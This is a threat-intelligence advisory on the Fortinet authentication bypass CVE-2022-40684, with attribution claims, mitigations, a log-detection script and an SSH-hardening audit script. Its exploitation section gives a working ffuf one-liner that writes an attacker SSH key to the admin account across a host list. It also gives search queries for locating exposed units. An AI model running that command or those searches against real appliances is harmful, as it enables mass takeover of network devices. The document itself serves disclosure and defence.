Fortinet Authentication Bypass Vulnerability Exploited by Threat Actors

EXECUTIVE SUMMARY

A critical authentication bypass vulnerability in Fortinet appliances, tracked as CVE-2022-40684, has been discovered to be actively exploited in the wild. An authentication bypass using an alternate path or channel [CWE-288] in FortiOS, FortiProxy, and FortiSwitchManager could allow an unauthenticated attacker to perform administrative interface operations using specially crafted HTTP or HTTPS requests. Fortinet recently issued a PSIRT Advisory regarding CVE-2022-40684, which includes urgent mitigation guidance, upgrades, workarounds for customers, and recommended next steps.
The CYFIRMA research team conducted a detailed analysis of the vulnerability from the point of view of the exploit, and also monitored underground forum discussion of the vulnerability and its association with threat actors.

KEY TAKEAWAYS

  • Successful exploitation of the vulnerability could allow the remote attacker to bypass security and gain privileged access to execute unauthorized code or commands.
  • Darkweb forum discussions indicated ransomware groups’ attention on the CVE. They also cast light on threat actors’ interest in understanding what changed in the patch at the time of the fix, so that they can exploit older versions.
  • Our intelligence research community observed Iranian and Chinese threat actors abusing vulnerabilities in Fortinet products. The suspected threat actors are US17IRGCorp aka APT34, HAFNIUM, and their affiliates in the ongoing campaign “درب عقب”, translating to “Tailgate”.
  • Methods discussed by hackers and their interests: exploiting weaknesses in the systems, Man-in-the-Middle (MitM) attacks, potential ransomware attacks, and lateral movement into the organization’s network.

VULNERABILITY AT A GLANCE

Authentication Bypass Vulnerability in Fortigate

  • CVE-2022-40684
  • CVSS Score: 9.8
  • CYFIRMA Risk Rating: Critical
  • Exploit Detail: Link

Description:
An authentication bypass via an alternate path or channel [CWE-288] in Fortinet FortiOS versions 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy versions 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager versions 7.2.0 and 7.0.0 enables an unauthenticated attacker to perform administrative interface operations via specially crafted HTTP or HTTPS requests.

Impact:
Successful exploitation of the vulnerability could allow the remote attacker to bypass security and gain privileged access to execute unauthorized code or commands.

Affected Version:

Security Indicators

  • Is there already an exploit tool to attack this vulnerability? Yes
  • Has this vulnerability already been used in an attack? Yes
  • Are hackers discussing this vulnerability in the Deep/Dark Web? Yes
  • What is the attack complexity level? Low
  • According to CISA’s Known Exploited Vulnerabilities Catalog, threat actors have historically exploited Fortinet vulnerabilities to obtain initial access and move laterally within a victim’s environment. We assess that threat actors will continue to exploit this vulnerability in the near future to obtain initial access resulting in access to sensitive information, such as the appliance’s configuration file, due to the ease of exploitation, the potential for payload delivery, and the presence of affected Fortinet units within enterprise environments.

Mitigation
Fortinet recently issued a PSIRT Advisory regarding CVE-2022-40684, which includes urgent mitigation guidance, upgrades, workarounds for customers, and recommended next steps. Please refer to that advisory for the mitigation details.

EXPLOITING CVE-2022-40684
The CYFIRMA research team analyzed different methods of exploiting CVE-2022-40684.

Manually adding SSH keys to check if the target is vulnerable to exploit

Step 1: Add the SSH key to the vulnerable target using the add_key method.

Step 2: Log in to the vulnerable target using the credentials saved in step 1 to access the Fortinet administrative interface.

Step 3: After the credentials are validated, the user has access to the Fortinet administrative interface. On the Logs page, we can validate that a new user with admin privileges has been added to the interface.

Automate with FFUF Scanner: Open-source exploit using FFUF Scanner
ffuf -w "host_list.txt:URL" -u "https://URL/api/v2/cmdb/system/admin/admin" -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1]:8000";by="[127.0.0.1]:9000";' -d '{"ssh-public-key1": "cyfirma"}' -mr "SSH" -r

Nuclei – Open-source exploit using Nuclei Template
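Seen from the defender's side, the request shape used in the steps above is also the detection signature: a PUT to the admin REST API path, a "Report Runner" User-Agent, a Forwarded header claiming a loopback origin, and an ssh-public-key attribute written to an admin account. The following Python script is an added example, not CYFIRMA's or Fortinet's code. It scores FortiOS-style key=value log records against those indicators plus the user="Local_Process_Access" and user_interface="Node.js" indicators that Fortinet's PSIRT advisory lists for this CVE; the log records, IP addresses and log field names are constructed for the example and flag a record only when two or more indicators coincide, since the admin API path alone is normal administrator traffic.

```python
"""Detection helper for CVE-2022-40684 exploitation attempts.

Added example (not CYFIRMA's or Fortinet's code). Parses FortiOS-style
key=value / key="quoted value" records and counts the exploit indicators
present in each one. Field names (path, ua, forwarded, body, cfgattr, ui)
and all sample records below are constructed for the example.
"""
import re
from dataclasses import dataclass

# Admin REST API object path targeted by the exploit (from the advisory).
ADMIN_API = re.compile(r"^/api/v2/cmdb/system/admin(?:/|$)")
# Forwarded header asserting that the request originated on the appliance itself.
LOOPBACK_FORWARDED = re.compile(r'(?:for|by)="?\[?127\.0\.0\.1', re.IGNORECASE)
# key=value or key="value with spaces" tokens, as FortiOS logs emit them.
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# User-Agent / user_interface values Fortinet's advisory names as indicators.
ADVISORY_UI = {"node.js", "report runner"}


@dataclass
class Finding:
    line_no: int
    srcip: str
    reasons: list

    @property
    def score(self) -> int:
        return len(self.reasons)


def parse_record(line: str) -> dict:
    """Turn one log line into a dict; quoted and bare values both supported."""
    rec = {}
    for m in KV.finditer(line):
        rec[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return rec


def evaluate(rec: dict) -> list:
    """Return the exploit indicators present in a single parsed record."""
    reasons = []
    if ADMIN_API.match(rec.get("path", "")):
        reasons.append("admin REST API path")
        if rec.get("method", "").upper() in ("PUT", "POST"):
            reasons.append("write method against admin objects")
    ui = (rec.get("ua") or rec.get("ui") or "").lower()
    if ui in ADVISORY_UI:
        reasons.append(f"user-agent/interface '{ui}' (advisory indicator)")
    if LOOPBACK_FORWARDED.search(rec.get("forwarded", "")):
        reasons.append("Forwarded header claiming loopback origin")
    if "ssh-public-key" in rec.get("body", "") + rec.get("cfgattr", ""):
        reasons.append("ssh-public-key written to an admin account")
    if rec.get("user") == "Local_Process_Access":
        reasons.append("user=Local_Process_Access (advisory indicator)")
    return reasons


def scan(lines, threshold: int = 2) -> list:
    """Flag records carrying at least `threshold` corroborating indicators."""
    findings = []
    for n, line in enumerate(lines, 1):
        rec = parse_record(line)
        reasons = evaluate(rec)
        if len(reasons) >= threshold:
            findings.append(Finding(n, rec.get("srcip", "-"), reasons))
    return findings


SAMPLE_LOG = [  # constructed records, not real telemetry
    'date=2022-10-13 time=09:58:11 srcip=10.0.0.5 method=GET path="/api/v2/cmdb/system/admin" ua="Mozilla/5.0" user="admin"',
    'date=2022-10-13 time=10:02:47 srcip=198.51.100.7 method=PUT path="/api/v2/cmdb/system/admin/admin" ua="Report Runner" forwarded="for=[127.0.0.1]:8000;by=[127.0.0.1]:9000" body="ssh-public-key1=ssh-rsa AAAA...attacker"',
    'date=2022-10-13 time=10:02:48 type="event" user="Local_Process_Access" ui="Node.js" action="Edit" cfgpath="system.admin" cfgobj="admin" cfgattr="ssh-public-key1[ssh-rsa AAAA...attacker]"',
    'date=2022-10-13 time=10:05:00 srcip=10.0.0.9 method=POST path="/logincheck" ua="Mozilla/5.0"',
    'date=2022-10-13 time=10:06:30 srcip=10.0.0.2 method=GET path="/api/v2/monitor/system/status" ua="curl/7.85" forwarded="for=10.1.1.1"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no} src={f.srcip} score={f.score}: {'; '.join(f.reasons)}")
```

The second and third constructed records show the two places the same event surfaces: the inbound HTTP request (if the appliance or an upstream proxy logs it) and the resulting configuration-change event attributed to Local_Process_Access. Lowering `threshold` to 1 makes the script list every touch of the admin API, which is useful for a one-off review but too noisy for continuous alerting.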

Darkweb Observations
Our research team observed conversations around CVE-2022-40684 exploits in a well-known underground forum. Bassterlord is a well-known name in the underground who has had associations with the LockBit, REvil, Avaddon, and RansomExx groups as a partner. The presence of Bassterlord in the Fortinet CVE conversation is an indication of ransomware groups’ attention on the CVE. The conversation also sheds light on threat actors’ interest in understanding what changed in the patch at the time of the fix, so that they can exploit older versions.

Vulnerable Targets

OSINT tools assist in identifying possible vulnerable targets.
OSINT Search 1 – Google Dorks – intext:"Please Login" inurl:"/remote/login" – This dork returns 100+ vulnerable Fortinet login pages.

OSINT Search 2 – raw_data.web.paths:"/api/v2/cmdb/system/admin"
In our OSINT research, we found 200+ vulnerable IPs associated with CVE-2022-40684.

OSINT Search 3 – A Shodan search returned 171k Fortinet FortiGate systems spread across the globe and connected to the internet.

In another OSINT search, we found that around 16k Fortinet FortiGate units across the globe were vulnerable to 10 different vulnerabilities other than CVE-2022-40684.

MOST AFFECTED COUNTRIES

SUSPECTED THREAT ACTORS

Upon analysing the internet-exposed Fortinet units found through OSINT searches and passing them through DeCYFIR threat-actor attribution, we observed that Iranian and Chinese threat actors have already exploited Fortinet IPs for malicious activities.

Campaign Attribution

Our intelligence community research observed a campaign “درب عقب”, translating to “Tailgate”, suspected to have been launched on 15 September 2022 and targeting weak/vulnerable Fortinet products that could be exploited using existing exploits by US17IRGCorp aka APT34 and its affiliates.

As part of the campaign, we also noticed Persian cybercriminals potentially colluding with Chinese groups and Russian cybercriminals. From a strategic viewpoint on the changing geopolitical scenario, as seen from external threat landscape management, Iran and China are forming strategic relationships with Russia at all levels and have supported Russia in the ongoing Ukraine conflict.

Target Industries

Target Geographies

Motivation
Exfiltration of sensitive information for financial gain, and credential stealing to gain elevated access and cause operational disruption and reputational damage.

INDICATORS OF COMPROMISE

CYFIRMA would like to highlight the potential risk and indicators observed which may be leveraged by nation-state threat actors to exploit the vulnerability and gain a foothold to exfiltrate sensitive information from the target organizations.

RECOMMENDED ACTIONS

  • Build and undertake safeguarding measures by monitoring/blocking the IOCs and strengthening defences based on the intelligence provided.
  • Integrate CTI feeds with existing SIEM solutions to allow faster detection and alerting of malicious activities. Enrich threat intelligence by combining local monitoring, and internal & external feeds.
  • Deploy an advanced Endpoint Detection and Response (EDR) engine as part of the organization’s layered security strategy.
  • Patch/upgrade all applications/software with the latest versions on priority as soon as they become available.
  • Configure network defence systems such as intrusion detection systems (IDS) and intrusion prevention systems (IPS) for real-time alerts.
  • The use of CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) is effective against automated bots.
  • Restrict the logins to a specific range of IP Addresses.
  • Implement Multi-Factor Authentication (MFA) to reduce the risk of potential data breaches.
  • Make the root user inaccessible via SSH by editing the sshd_config file and implementing the ‘DenyUsers root’ and ‘PermitRootLogin no’ options.
  • Move to a non-standard port for SSH instead of using the default port 22 and edit the new port line in the sshd_config file.
  • Move to a non-standard port for RDP instead of using the default port 3389.
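The SSH items in the list above (disabling root login, denying the root user, and moving off port 22) are easy to state but easy to get wrong in practice, because sshd honours the first occurrence of a keyword, treats keywords case-insensitively, and applies directives inside a Match block only conditionally. The following Python audit helper is an added example, not CYFIRMA's code; it parses sshd_config text with those rules and reports whether each of the three recommendations is satisfied. The two sample configurations are constructed for the example.

```python
"""Audit an sshd_config for the SSH hardening recommendations above.

Added example (not CYFIRMA's code). Rules implemented, as OpenSSH applies them:
first occurrence of a keyword wins, keywords are case-insensitive, '#' starts a
comment, 'Key value' and 'Key=value' forms are both accepted, and everything
after the first Match line is conditional and therefore excluded from the
global audit. The sample configurations below are constructed.
"""
import re

# Keywords that may be repeated and accumulate values rather than being overridden.
REPEATABLE = {"port", "denyusers", "allowusers", "listenaddress"}


def parse_sshd_config(text: str) -> dict:
    """Return {keyword_lower: [values]} for the global section of an sshd_config."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and surrounding whitespace
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            break  # conditional block: global settings end here
        if key in REPEATABLE:
            conf.setdefault(key, []).extend(value.split())
        elif key not in conf:
            conf[key] = [value]  # first occurrence wins
    return conf


def audit(text: str) -> dict:
    """Check the three SSH recommendations; True means the recommendation is met."""
    conf = parse_sshd_config(text)
    # OpenSSH's compiled-in default for PermitRootLogin is prohibit-password, not 'no'.
    permit_root = conf.get("permitrootlogin", ["prohibit-password"])[0].lower()
    ports = conf.get("port", ["22"])
    return {
        "permit_root_login": permit_root == "no",
        "root_denied": "root" in conf.get("denyusers", []),
        "non_default_port": "22" not in ports,
    }


WEAK_CONFIG = """\
# constructed sample: default port, root login allowed
Port 22
PermitRootLogin yes
PasswordAuthentication yes
"""

HARDENED_CONFIG = """\
# constructed sample: follows the recommendations above
Port 2222
PermitRootLogin no
DenyUsers root
PermitRootLogin yes   # ignored: a later duplicate never overrides the first
Match User backup
    PermitRootLogin yes   # ignored: inside a Match block
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(cfg))
```

Run it against `/etc/ssh/sshd_config` by reading the file and passing the text to `audit`; a False entry names the recommendation still outstanding. The audit deliberately ignores Match blocks, so a `PermitRootLogin yes` scoped to a Match condition is not reported as a global weakness, which is what the per-host recommendation is about.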